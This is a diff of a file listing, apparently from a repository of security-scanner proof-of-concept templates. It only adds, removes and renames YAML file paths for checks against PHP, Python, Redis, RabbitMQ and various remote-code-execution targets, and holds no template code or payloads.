./poc/other/wise-chat-8c10bb16c734c3ae0e0598296078da6b.yaml
@@ -81370,6 +81347,7 @@
./poc/other/wooyun-2015-093724.yaml
./poc/other/wooyun-2015-096676.yaml
./poc/other/wooyun-2015-097832.yaml
+./poc/other/wooyun-2015-148227(1).yaml
./poc/other/wooyun-2015-148227-11224.yaml
./poc/other/wooyun-2015-148227-11225.yaml
./poc/other/wooyun-2015-148227-11226.yaml
@@ -81472,7 +81450,7 @@
./poc/other/workscout.yaml
./poc/other/workspace-one-uem-11391.yaml
./poc/other/workspace-one-uem-11392.yaml
-./poc/other/workspace-one-uem-11393.yaml
+./poc/other/workspace-one-uem-11394.yaml
./poc/other/workspace-one-uem.yaml
./poc/other/workspaceone-uem-dashboard-11390.yaml
./poc/other/workspaceone-uem-dashboard.yaml
@@ -81511,7 +81489,6 @@
./poc/other/wowza-streaming-engine-11396.yaml
./poc/other/wowza-streaming-engine-11397.yaml
./poc/other/wowza-streaming-engine-11398.yaml
-./poc/other/wowza-streaming-engine-11399.yaml
./poc/other/wowza-streaming-engine.yaml
./poc/other/wowza-wowzastreamingengine.yaml
./poc/other/wr-age-verification-40b3c90da10d9246a3d45605cfab9759.yaml
@@ -81562,14 +81539,13 @@
./poc/other/wsm-downloader.yaml
./poc/other/wsncm-iot.yaml
./poc/other/wsncm-system.yaml
-./poc/other/wso2-2019-0598-11635.yaml
./poc/other/wso2-2019-0598-11636.yaml
./poc/other/wso2-carbon-server.yaml
-./poc/other/wso2-management-console-11644.yaml
./poc/other/wso2-management-console-11645.yaml
./poc/other/wso2-management-console-11646.yaml
+./poc/other/wso2-management-console-11647.yaml
./poc/other/wso2-management-console.yaml
-./poc/other/wso2mgmtconsole(1).yaml
+./poc/other/wso2mgmtconsole.yaml
./poc/other/wstmart.yaml
./poc/other/wti-like-post-801384ebb6b98e29bbc3da65ee0914d2.yaml
./poc/other/wti-like-post-c854ddc867a3e00f9bba9d6f39d622e4.yaml
@@ -81762,6 +81738,7 @@
./poc/other/yarn-lock-11727.yaml
./poc/other/yarn-lock-11729.yaml
./poc/other/yarn-lock-11730.yaml
+./poc/other/yarn-lock.yaml
./poc/other/yatra-cbaa3d03ba7367a64c11c6690f1f36b8.yaml
./poc/other/yatra.yaml
./poc/other/yatri-tools-45a4d9b5b716af9eb5f5cf5c683a0860.yaml
@@ -81844,6 +81821,7 @@
./poc/other/yml-for-yandex-market.yaml
./poc/other/yongyou-ELTextFile.yaml
./poc/other/yongyou-changjietong-EFI.yaml
+./poc/other/yongyou-eltextfile.yaml
./poc/other/yongyou-fileRead.yaml
./poc/other/yonyou-chanjet-tplus-downloadproxy-filedownload.yaml
./poc/other/yonyou-chanjet-tplus-getdecallusers-infoleak.yaml
@@ -81895,7 +81873,7 @@
./poc/other/yop-poll-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/yop-poll-plugin.yaml
./poc/other/yop-poll.yaml
-./poc/other/yopass-panel-11749.yaml
+./poc/other/yopass-panel-11750.yaml
./poc/other/yopass-panel.yaml
./poc/other/yottabyte-rizhiyi.yaml
./poc/other/you-shang-3047371f5c7a9995238b090856ba5be3.yaml
@@ -82115,8 +82093,9 @@
./poc/other/zhiyuan-fileRead.yaml
./poc/other/zhiyuan-oa-info-leak-11797.yaml
./poc/other/zhiyuan-oa-info-leak-11798.yaml
-./poc/other/zhiyuan-oa-info-leak-11800.yaml
+./poc/other/zhiyuan-oa-info-leak-11799.yaml
./poc/other/zhongan-xdecision.yaml
+./poc/other/zhongkewangwei-fileread.yaml
./poc/other/zhongshengsoft-crm.yaml
./poc/other/zhongtan-ndstart.yaml
./poc/other/zhongyou-system.yaml
@@ -82246,6 +82225,7 @@
./poc/other/zte-zxsec统一安全网关.yaml
./poc/other/zuitu.yaml
./poc/other/zuul-panel-11842.yaml
+./poc/other/zuul-panel-11843.yaml
./poc/other/zuul-panel.yaml
./poc/other/zuul-panel.yml
./poc/other/zwave2mqtt-health-check.yaml
@@ -82444,6 +82424,7 @@
./poc/perl/perl-scanner.yaml
./poc/perl/perl-status-9485.yaml
./poc/perl/perl-status-9486.yaml
+./poc/perl/perl-status-9487.yaml
./poc/perl/perl-status-page.yaml
./poc/perl/superlist-5da18e3bfe18177f7ef82fb6ae815fe6.yaml
./poc/perl/superlist-ca628bb2dee1036910f5dc781a4bf2d7.yaml
@@ -82510,6 +82491,7 @@
./poc/php/bohuangwanglong-cmd-php-rce.yaml
./poc/php/bsphp-nauthorized-access.yaml
./poc/php/btoptionscom-hbr_php-sqli.yaml
+./poc/php/clockwork-php-page-1016.yaml
./poc/php/clockwork-php-page-1017.yaml
./poc/php/clockwork-php-page-1018.yaml
./poc/php/clockwork-php-page-1019.yaml
@@ -82573,7 +82555,7 @@
./poc/php/php-backup-files-7.yaml
./poc/php/php-backup-files-8.yaml
./poc/php/php-backup-files-9.yaml
-./poc/php/php-backup-files-9497.yaml
+./poc/php/php-backup-files-9498.yaml
./poc/php/php-backup-files.yaml
./poc/php/php-cgi-cve-2012-1823.yml
./poc/php/php-cloud.yaml
@@ -82590,9 +82572,7 @@
./poc/php/php-errors-9508.yaml
./poc/php/php-errors-9509.yaml
./poc/php/php-errors-9510.yaml
-./poc/php/php-errors-9511.yaml
./poc/php/php-errors-9512.yaml
-./poc/php/php-errors.yaml
./poc/php/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml
./poc/php/php-event-calendar-4c41621f6e7b56d3c4fdd926d807fd58.yaml
./poc/php/php-event-calendar-abf62654d5558f36cc7e98af2469b42e.yaml
@@ -82620,9 +82600,9 @@
./poc/php/php-proxy-detect-1.yaml
./poc/php/php-proxy-detect-2.yaml
./poc/php/php-proxy-detect-9544.yaml
-./poc/php/php-proxy-detect.yaml
./poc/php/php-scanner-9546.yaml
./poc/php/php-scanner-9547.yaml
+./poc/php/php-scanner.yaml
./poc/php/php-server-monitor.yaml
./poc/php/php-shell-0771e0dee276537bea17fe994946d6c2.yaml
./poc/php/php-shell-aa4a6da32c1b252d9d4bc241fb9c858f.yaml
@@ -82650,11 +82630,10 @@
./poc/php/php-warning-9562.yaml
./poc/php/php-warning-9563.yaml
./poc/php/php-warning.yaml
-./poc/php/php-zerodium-backdoor-rce-9569.yaml
./poc/php/php-zerodium-backdoor-rce-9570.yaml
./poc/php/php-zerodium-backdoor-rce-9571.yaml
+./poc/php/php-zerodium-backdoor-rce-9572.yaml
./poc/php/php-zerodium-backdoor-rce-9573.yaml
-./poc/php/php-zerodium-backdoor-rce.yaml
./poc/php/php-zerodium-backdoor.yaml
./poc/php/php.yaml
./poc/php/php168cms.yaml
@@ -82664,10 +82643,11 @@
./poc/php/phpbb.yaml
./poc/php/phpcms-cve-2018-19127.yml
./poc/php/phpcms.yaml
+./poc/php/phpcollab-detect-9499.yaml
./poc/php/phpcollab-detect-9500.yaml
./poc/php/phpcollab-detect.yaml
./poc/php/phpcollab-panel.yaml
-./poc/php/phpcollab-workflow-9503.yaml
+./poc/php/phpcollab-workflow-9502.yaml
./poc/php/phpcollab-workflow.yaml
./poc/php/phpcollab.yaml
./poc/php/phpdealerlocator.yaml
@@ -82697,7 +82677,6 @@
./poc/php/phpinfo-9517.yaml
./poc/php/phpinfo-9518.yaml
./poc/php/phpinfo-9519.yaml
-./poc/php/phpinfo-9520.yaml
./poc/php/phpinfo-9521.yaml
./poc/php/phpinfo-9522.yaml
./poc/php/phpinfo-disclosure-env.yaml
@@ -82707,6 +82686,7 @@
./poc/php/phpinfo-wp.yaml
./poc/php/phpinfo.yaml
./poc/php/phpldap-admin.yaml
+./poc/php/phpldapadmin-panel.yaml
./poc/php/phpldapadmin-xss.yaml
./poc/php/phpldapadmin.yaml
./poc/php/phplist-邮件系统.yaml
@@ -82740,12 +82720,11 @@
./poc/php/phpmyadmin-setup-11857.yaml
./poc/php/phpmyadmin-setup-9529.yaml
./poc/php/phpmyadmin-setup-9530.yaml
-./poc/php/phpmyadmin-setup-9531.yaml
+./poc/php/phpmyadmin-setup-9532.yaml
./poc/php/phpmyadmin-setup-9533.yaml
./poc/php/phpmyadmin-setup-deserialization.yaml
./poc/php/phpmyadmin-setup-deserialization.yml
./poc/php/phpmyadmin-setup.yaml
-./poc/php/phpmyadmin-sql-9534.yaml
./poc/php/phpmyadmin-sql-9535.yaml
./poc/php/phpmyadmin-sql-9536.yaml
./poc/php/phpmyadmin-sql.php-server-1.yaml
@@ -82792,11 +82771,11 @@
./poc/php/phpsword-favicon-manager.yaml
./poc/php/phpsysinfo.yaml
./poc/php/phpunit-9555.yaml
+./poc/php/phpunit-9556.yaml
./poc/php/phpunit-9557.yaml
./poc/php/phpunit-9558.yaml
./poc/php/phpunit-cve-2017-9841-rce.yml
./poc/php/phpunit-result-cache-exposure.yaml
-./poc/php/phpunit.yaml
./poc/php/phpweb.yaml
./poc/php/phpwiki-lfi-9564.yaml
./poc/php/phpwiki-lfi-9565.yaml
@@ -82840,18 +82819,17 @@
./poc/php/symfony-phpinfo.yaml
./poc/php/thinkphp-2-rce-10738.yaml
./poc/php/thinkphp-2-rce-10739.yaml
-./poc/php/thinkphp-2-rce-10740.yaml
./poc/php/thinkphp-2-rce-10741.yaml
./poc/php/thinkphp-30-rce.yaml
./poc/php/thinkphp-50-rce.yaml
./poc/php/thinkphp-501-rce-10742.yaml
-./poc/php/thinkphp-501-rce-10743.yaml
+./poc/php/thinkphp-501-rce.yaml
./poc/php/thinkphp-5010-rce.yaml
./poc/php/thinkphp-5022-5129-rce.yaml
+./poc/php/thinkphp-5022-rce-10744.yaml
./poc/php/thinkphp-5022-rce-10745.yaml
./poc/php/thinkphp-5022-rce-10746.yaml
-./poc/php/thinkphp-5022-rce.yaml
-./poc/php/thinkphp-5023-rce-10748.yaml
+./poc/php/thinkphp-5022-rce-10747.yaml
./poc/php/thinkphp-5023-rce-10749.yaml
./poc/php/thinkphp-5023-rce-10750.yaml
./poc/php/thinkphp-5023-rce-10751.yaml
@@ -82859,7 +82837,6 @@
./poc/php/thinkphp-509-information-disclosure-10752.yaml
./poc/php/thinkphp-509-information-disclosure-10753.yaml
./poc/php/thinkphp-509-information-disclosure-10754.yaml
-./poc/php/thinkphp-509-information-disclosure-10755.yaml
./poc/php/thinkphp-509-information-disclosure.yaml
./poc/php/thinkphp-50x-arbitrary-file-read.yaml
./poc/php/thinkphp-controller-rce.yml
@@ -82890,6 +82867,7 @@
./poc/php/tongda-oa-v2017-video-file-php-filedownload.yaml
./poc/php/tongda-oa-wbupload-php-fileupload.yaml
./poc/php/tosec-jumpserver-admin-php-sqli.yaml
+./poc/php/twig-php-ssti-10856.yaml
./poc/php/twig-php-ssti-10857.yaml
./poc/php/twig-php-ssti-10858.yaml
./poc/php/twig-php-ssti-10859.yaml
@@ -82913,7 +82891,6 @@
./poc/php/wp-livephp.yaml
./poc/php/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml
./poc/php/wp-php-widget.yaml
-./poc/php/wp-phpfreechat-xss-11524.yaml
./poc/php/wp-phpfreechat-xss-11526.yaml
./poc/php/wp-phpfreechat-xss-11527.yaml
./poc/php/wp-phpfreechat-xss-11528.yaml
@@ -82942,13 +82919,14 @@
./poc/python/Django-DebugMode.yaml
./poc/python/autobahn-python-detect-592.yaml
./poc/python/autobahn-python-detect-593.yaml
-./poc/python/autobahn-python-detect-595.yaml
+./poc/python/autobahn-python-detect-594.yaml
./poc/python/default-django-page-6840.yaml
./poc/python/default-django-page-6841.yaml
./poc/python/default-django-page-6842.yaml
./poc/python/default-django-page-6843.yaml
./poc/python/django-admin-panel-7021.yaml
./poc/python/django-admin-panel-7022.yaml
+./poc/python/django-admin-panel-7023.yaml
./poc/python/django-admin-panel.yaml
./poc/python/django-debug-detect-7024.yaml
./poc/python/django-debug-detect-7025.yaml
@@ -82956,6 +82934,7 @@
./poc/python/django-debug-detect.yaml
./poc/python/django-debug-enable.yaml
./poc/python/django-debug-enabled.yaml
+./poc/python/django-debug-exposed-404.yaml
./poc/python/django-debug-exposure-7028.yaml
./poc/python/django-debug-exposure-7029.yaml
./poc/python/django-debug-exposure-7030.yaml
@@ -82969,15 +82948,13 @@
./poc/python/django-directory-traversal.yaml
./poc/python/django-framework-exceptions-7033.yaml
./poc/python/django-framework-exceptions-7034.yaml
-./poc/python/django-framework-exceptions.yaml
./poc/python/django-rest-framework.yaml
-./poc/python/django-secret-key.yaml
+./poc/python/django-secret.key.yaml
./poc/python/django-variables-exposed.yaml
./poc/python/django.yaml
./poc/python/djangodebug.yaml
./poc/python/flask-redis-docker.yaml
./poc/python/flask-werkzeug-debug.yaml
-./poc/python/jupyter-ipython-unauth-8402.yaml
./poc/python/jupyter-ipython-unauth-8404.yaml
./poc/python/jupyter-ipython-unauth-8405.yaml
./poc/python/jupyter-ipython-unauth.yaml
@@ -82985,16 +82962,15 @@
./poc/python/python-metrics-9745.yaml
./poc/python/python-metrics-9746.yaml
./poc/python/python-metrics-9747.yaml
-./poc/python/python-metrics.yaml
./poc/python/python-phish.yaml
-./poc/python/python-scanner.yaml
+./poc/python/python-scanner-9748.yaml
./poc/rabbitmq/rabbitmq-config-exposure.yml
-./poc/rabbitmq/rabbitmq-dashboard-9776.yaml
./poc/rabbitmq/rabbitmq-dashboard-9777.yaml
./poc/rabbitmq/rabbitmq-dashboard-9778.yaml
+./poc/rabbitmq/rabbitmq-dashboard-9779.yaml
./poc/rabbitmq/rabbitmq-dashboard.yaml
+./poc/rabbitmq/rabbitmq-default-admin-9780.yaml
./poc/rabbitmq/rabbitmq-default-admin-9781.yaml
-./poc/rabbitmq/rabbitmq-default-admin-9782.yaml
./poc/rabbitmq/rabbitmq-default-admin.yaml
./poc/rabbitmq/rabbitmq-default-login-9783.yaml
./poc/rabbitmq/rabbitmq-default-login-9784.yaml
@@ -83012,6 +82988,7 @@
./poc/redis/exposed-redis-7336.yaml
./poc/redis/exposed-redis-7337.yaml
./poc/redis/exposed-redis-7338.yaml
+./poc/redis/exposed-redis-7339.yaml
./poc/redis/exposed-redis.yaml
./poc/redis/flask-redis-docker.yaml
./poc/redis/misconfigured-redis.yaml
@@ -83218,18 +83195,17 @@
./poc/remote_code_execution/apache-druid-kafka-connect-rce.yaml
./poc/remote_code_execution/apache-filename-brute-force-353.yaml
./poc/remote_code_execution/apache-filename-brute-force.yaml
-./poc/remote_code_execution/apache-flink-unauth-rce-355.yaml
./poc/remote_code_execution/apache-flink-unauth-rce-356.yaml
./poc/remote_code_execution/apache-flink-unauth-rce-357.yaml
./poc/remote_code_execution/apache-flink-unauth-rce-358.yaml
./poc/remote_code_execution/apache-flink-unauth-rce-359.yaml
./poc/remote_code_execution/apache-flink-upload-rce.yml
./poc/remote_code_execution/apache-httpd-cve-2021-41773-rce.yml
-./poc/remote_code_execution/apache-httpd-rce-362.yaml
./poc/remote_code_execution/apache-httpd-rce-363.yaml
./poc/remote_code_execution/apache-httpd-rce.yaml
./poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml
./poc/remote_code_execution/apache-solr-91-rce.yaml
+./poc/remote_code_execution/apache-solr-log4j-rce-372.yaml
./poc/remote_code_execution/apache-solr-log4j-rce.yaml
./poc/remote_code_execution/apache-solr-rce.yaml
./poc/remote_code_execution/apache-spark-rce.yaml
@@ -83386,7 +83362,7 @@
./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-5989797b3de4a7d046b22faa41f147a5.yaml
./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/choice-payment-gateway-for-woocommerce.yaml
-./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml
+./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml
./poc/remote_code_execution/cisco-rv-series-rce.yaml
./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml
./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -83410,8 +83386,8 @@
./poc/remote_code_execution/co2ok-for-woocommerce-plugin.yaml
./poc/remote_code_execution/co2ok-for-woocommerce.yaml
./poc/remote_code_execution/code42-log4j-rce-1130.yaml
-./poc/remote_code_execution/code42-log4j-rce-1131.yaml
./poc/remote_code_execution/code42-log4j-rce-1132.yaml
+./poc/remote_code_execution/code42-log4j-rce.yaml
./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-0524990b8a93f2e726c050d49aa0b22e.yaml
./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-3574e2251d76d53bdcc685462fdb0300.yaml
./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -83442,10 +83418,10 @@
./poc/remote_code_execution/consul-rexec-rce.yml
./poc/remote_code_execution/consul-service-rce.yaml
./poc/remote_code_execution/consul-service-rce.yml
-./poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml
./poc/remote_code_execution/core-chuangtian-cloud-rce-1208.yaml
./poc/remote_code_execution/core-chuangtian-cloud-rce-1209.yaml
./poc/remote_code_execution/core-chuangtian-cloud-rce-1210.yaml
+./poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml
./poc/remote_code_execution/core-chuangtian-cloud-rce-1212.yaml
./poc/remote_code_execution/core-chuangtian-cloud-rce.yaml
./poc/remote_code_execution/cost-of-goods-for-woocommerce-29aeaa3c6bb2e136205e4a60d94d44f4.yaml
@@ -83682,8 +83658,8 @@
./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin.yaml
./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic.yaml
-./poc/remote_code_execution/elex-woocommerce-xss-7199.yaml
./poc/remote_code_execution/elex-woocommerce-xss-7200.yaml
+./poc/remote_code_execution/elex-woocommerce-xss.yaml
./poc/remote_code_execution/elfinder-rce.yaml
./poc/remote_code_execution/email-customizer-for-woocommerce-2a0fbc617737467a0c1230deb2588849.yaml
./poc/remote_code_execution/email-customizer-for-woocommerce.yaml
@@ -83751,7 +83727,9 @@
./poc/remote_code_execution/extra-product-options-for-woocommerce.yaml
./poc/remote_code_execution/eyou-email-rce-7378.yaml
./poc/remote_code_execution/eyou-email-rce-7379.yaml
+./poc/remote_code_execution/eyou-email-rce-7380.yaml
./poc/remote_code_execution/eyou-email-rce-7381.yaml
+./poc/remote_code_execution/eyou-email-rce-7382.yaml
./poc/remote_code_execution/eyou-email-rce.yaml
./poc/remote_code_execution/eyou-mail-moni-detail-rce.yaml
./poc/remote_code_execution/f5-tmui-cve-2020-5902-rce.yml
@@ -83768,19 +83746,21 @@
./poc/remote_code_execution/fastjson-1-2-24-rce-1.yaml
./poc/remote_code_execution/fastjson-1-2-24-rce-2.yaml
./poc/remote_code_execution/fastjson-1-2-24-rce-7400.yaml
-./poc/remote_code_execution/fastjson-1-2-24-rce.yaml
./poc/remote_code_execution/fastjson-1-2-41-rce-7401.yaml
./poc/remote_code_execution/fastjson-1-2-41-rce-7403.yaml
./poc/remote_code_execution/fastjson-1-2-41-rce-7404.yaml
+./poc/remote_code_execution/fastjson-1-2-41-rce.yaml
./poc/remote_code_execution/fastjson-1-2-42-rce-7405.yaml
./poc/remote_code_execution/fastjson-1-2-42-rce-7407.yaml
-./poc/remote_code_execution/fastjson-1-2-42-rce.yaml
+./poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml
./poc/remote_code_execution/fastjson-1-2-43-rce-7409.yaml
./poc/remote_code_execution/fastjson-1-2-43-rce-7411.yaml
+./poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml
./poc/remote_code_execution/fastjson-1-2-47-rce-7413.yaml
./poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml
./poc/remote_code_execution/fastjson-1-2-47-rce-7416.yaml
./poc/remote_code_execution/fastjson-1-2-62-rce-7417.yaml
+./poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml
./poc/remote_code_execution/fastjson-1-2-62-rce-7420.yaml
./poc/remote_code_execution/fastjson-1-2-67-rce-7421.yaml
./poc/remote_code_execution/fastjson-1-2-67-rce-7423.yaml
@@ -83936,7 +83916,6 @@
./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml
./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml
./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml
-./poc/remote_code_execution/icewarp-webclient-rce-8133.yaml
./poc/remote_code_execution/image-source-control-isc-1f038aef0dcbd62c1999c43ff0e6ea69.yaml
./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml
./poc/remote_code_execution/image-source-control-isc.yaml
@@ -83959,7 +83938,7 @@
./poc/remote_code_execution/jamf-log4j-jndi-rce-8211.yaml
./poc/remote_code_execution/jamf-log4j-jndi-rce-8212.yaml
./poc/remote_code_execution/jamf-log4j-jndi-rce-8213.yaml
-./poc/remote_code_execution/jamf-log4j-jndi-rce.yaml
+./poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml
./poc/remote_code_execution/jazzcash-woocommerce-gateway-2b946216639ed77b4eb9e56a3219058b.yaml
./poc/remote_code_execution/jazzcash-woocommerce-gateway.yaml
./poc/remote_code_execution/jeewms-dynamicDataSourceController-rce.yaml
@@ -84054,8 +84033,8 @@
./poc/remote_code_execution/lotapp-rce.yaml
./poc/remote_code_execution/lotuscms-rce-1.yaml
./poc/remote_code_execution/lotuscms-rce-2.yaml
-./poc/remote_code_execution/lotuscms-rce-8650.yaml
./poc/remote_code_execution/lotuscms-rce-8651.yaml
+./poc/remote_code_execution/lotuscms-rce-8652.yaml
./poc/remote_code_execution/lotuscms-rce-8653.yaml
./poc/remote_code_execution/maccms-rce.yaml
./poc/remote_code_execution/maccms-rce.yml
@@ -84082,6 +84061,7 @@
./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml
./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml
./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml
+./poc/remote_code_execution/metersphere-plugin-rce.yaml
./poc/remote_code_execution/mgb-opensource-guestbook.yaml
./poc/remote_code_execution/microblogrce.yaml
./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml
@@ -84092,7 +84072,6 @@
./poc/remote_code_execution/minmax-quantity-for-woocommerce.yaml
./poc/remote_code_execution/mirai-unknown-rce-8897.yaml
./poc/remote_code_execution/mirai-unknown-rce-8898.yaml
-./poc/remote_code_execution/mirai-unknown-rce-8899.yaml
./poc/remote_code_execution/mobile-login-woocommerce-23d0bf81c74275c3e55e25a6c8aa8e5b.yaml
./poc/remote_code_execution/mobile-login-woocommerce-71c68dc9d2433d718771a35db7cc14f9.yaml
./poc/remote_code_execution/mobile-login-woocommerce-776ff600825d9dc7d0f61014766c27a4.yaml
@@ -84183,7 +84162,6 @@
./poc/remote_code_execution/ns-woocommerce-watermark-f2c10bb888c008fbd876fd44d534b759.yaml
./poc/remote_code_execution/ns-woocommerce-watermark.yaml
./poc/remote_code_execution/nsfocus-sas-rce-exec.yaml
-./poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml
./poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml
./poc/remote_code_execution/nuuo-nvrmini2-rce-9172.yaml
./poc/remote_code_execution/nuuo-nvrmini2-rce-9173.yaml
@@ -84199,6 +84177,7 @@
./poc/remote_code_execution/opentsdb-rce-2.yaml
./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9341.yaml
./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9342.yaml
+./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml
./poc/remote_code_execution/oracle-commerce-cloud.yaml
./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml
@@ -84238,6 +84217,7 @@
./poc/remote_code_execution/out-of-stock-display-for-woocommerce.yaml
./poc/remote_code_execution/pagination-styler-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml
./poc/remote_code_execution/pagination-styler-for-woocommerce.yaml
+./poc/remote_code_execution/panabit-sy_addmount-rce.yaml
./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml
./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml
./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml
@@ -84278,8 +84258,8 @@
./poc/remote_code_execution/pbootcms-v3.1.2-rce.yaml
./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce-9d530be5fa0db61096efe68f160be112.yaml
./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce.yaml
+./poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml
./poc/remote_code_execution/pdf-signer-ssti-to-rce-9471.yaml
-./poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml
./poc/remote_code_execution/pdf-signer-ssti-to-rce.yaml
./poc/remote_code_execution/perfect-woocommerce-brands-7f5741480217fb4df85d3b4de3f502cb.yaml
./poc/remote_code_execution/perfect-woocommerce-brands-e32d6103a8131017699f2d0178c74f2a.yaml
@@ -84298,9 +84278,8 @@
./poc/remote_code_execution/personalize-woocommerce-cart-page.yaml
./poc/remote_code_execution/pgsql-extensions-rce.yaml
./poc/remote_code_execution/phalcon-framework-source-9493.yaml
+./poc/remote_code_execution/phalcon-framework-source-9494.yaml
./poc/remote_code_execution/phalcon-framework-source-9495.yaml
-./poc/remote_code_execution/phalcon-framework-source-9496.yaml
-./poc/remote_code_execution/phalcon-framework-source.yaml
./poc/remote_code_execution/phone-orders-for-woocommerce-5f600e44d5a9bae2880bbdac987c18c0.yaml
./poc/remote_code_execution/phone-orders-for-woocommerce-754324d17136d5a0b95bd48018ce3ad6.yaml
./poc/remote_code_execution/phone-orders-for-woocommerce-a18b8eeee685e84b7ab5bc1637d15598.yaml
@@ -84310,11 +84289,10 @@
./poc/remote_code_execution/phone-orders-for-woocommerce-plugin.yaml
./poc/remote_code_execution/phone-orders-for-woocommerce.yaml
./poc/remote_code_execution/php-8.1.0-dev-rce-sqli.yaml
-./poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml
./poc/remote_code_execution/php-zerodium-backdoor-rce-9570.yaml
./poc/remote_code_execution/php-zerodium-backdoor-rce-9571.yaml
+./poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml
./poc/remote_code_execution/php-zerodium-backdoor-rce-9573.yaml
-./poc/remote_code_execution/php-zerodium-backdoor-rce.yaml
./poc/remote_code_execution/phprce.yaml
./poc/remote_code_execution/phpstudy-backdoor-rce.yaml
./poc/remote_code_execution/phpstudy-backdoor-rce.yml
@@ -84332,8 +84310,10 @@
./poc/remote_code_execution/portugal-ctt-tracking-woocommerce.yaml
./poc/remote_code_execution/powercreator-cms-rce-9643.yaml
./poc/remote_code_execution/powercreator-cms-rce-9644.yaml
+./poc/remote_code_execution/powercreator-cms-rce-9645.yaml
./poc/remote_code_execution/powercreator-cms-rce-9646.yaml
./poc/remote_code_execution/powercreator-cms-rce-9647.yaml
+./poc/remote_code_execution/powercreator-cms-rce.yaml
./poc/remote_code_execution/pre-orders-for-woocommerce-687db182b0c9655d84523f55416267f1.yaml
./poc/remote_code_execution/pre-orders-for-woocommerce.yaml
./poc/remote_code_execution/premmerce-05c315c45c3d1e8458984521e6889db5.yaml
@@ -84476,8 +84456,10 @@
./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9755.yaml
./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9756.yaml
./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml
+./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9758.yaml
./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml
./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9760.yaml
+./poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml
./poc/remote_code_execution/qianxin-secgate3600-syshandupfile-upload-rce.yaml
./poc/remote_code_execution/qilin-bastion-host-rce.yaml
./poc/remote_code_execution/qilin-bastion-host-rce.yml
@@ -84583,7 +84565,6 @@
./poc/remote_code_execution/salesforce-aura-9984.yaml
./poc/remote_code_execution/salesforce-aura-detect.yml
./poc/remote_code_execution/salesforce-aura-misconfig.yaml
-./poc/remote_code_execution/salesforce-aura.yaml
./poc/remote_code_execution/salesforce-credentials-detect.yml
./poc/remote_code_execution/salesforce-login.yaml
./poc/remote_code_execution/salesforce-misconfiguration.yaml
@@ -84605,6 +84586,7 @@
./poc/remote_code_execution/sangfor-ad-login-rce.yaml
./poc/remote_code_execution/sangfor-ad-rce.yaml
./poc/remote_code_execution/sangfor-ba-rce(1).yaml
+./poc/remote_code_execution/sangfor-ba-rce-10020.yaml
./poc/remote_code_execution/sangfor-ba-rce-10021.yaml
./poc/remote_code_execution/sangfor-ba-rce.yml
./poc/remote_code_execution/sangfor-cphp-rce.yaml
@@ -84634,6 +84616,7 @@
./poc/remote_code_execution/seacms-before-v992-rce.yaml
./poc/remote_code_execution/seacms-before-v992-rce.yml
./poc/remote_code_execution/seacms-rce-10100.yaml
+./poc/remote_code_execution/seacms-rce-10101.yaml
./poc/remote_code_execution/seacms-rce-10102.yaml
./poc/remote_code_execution/seacms-rce.yml
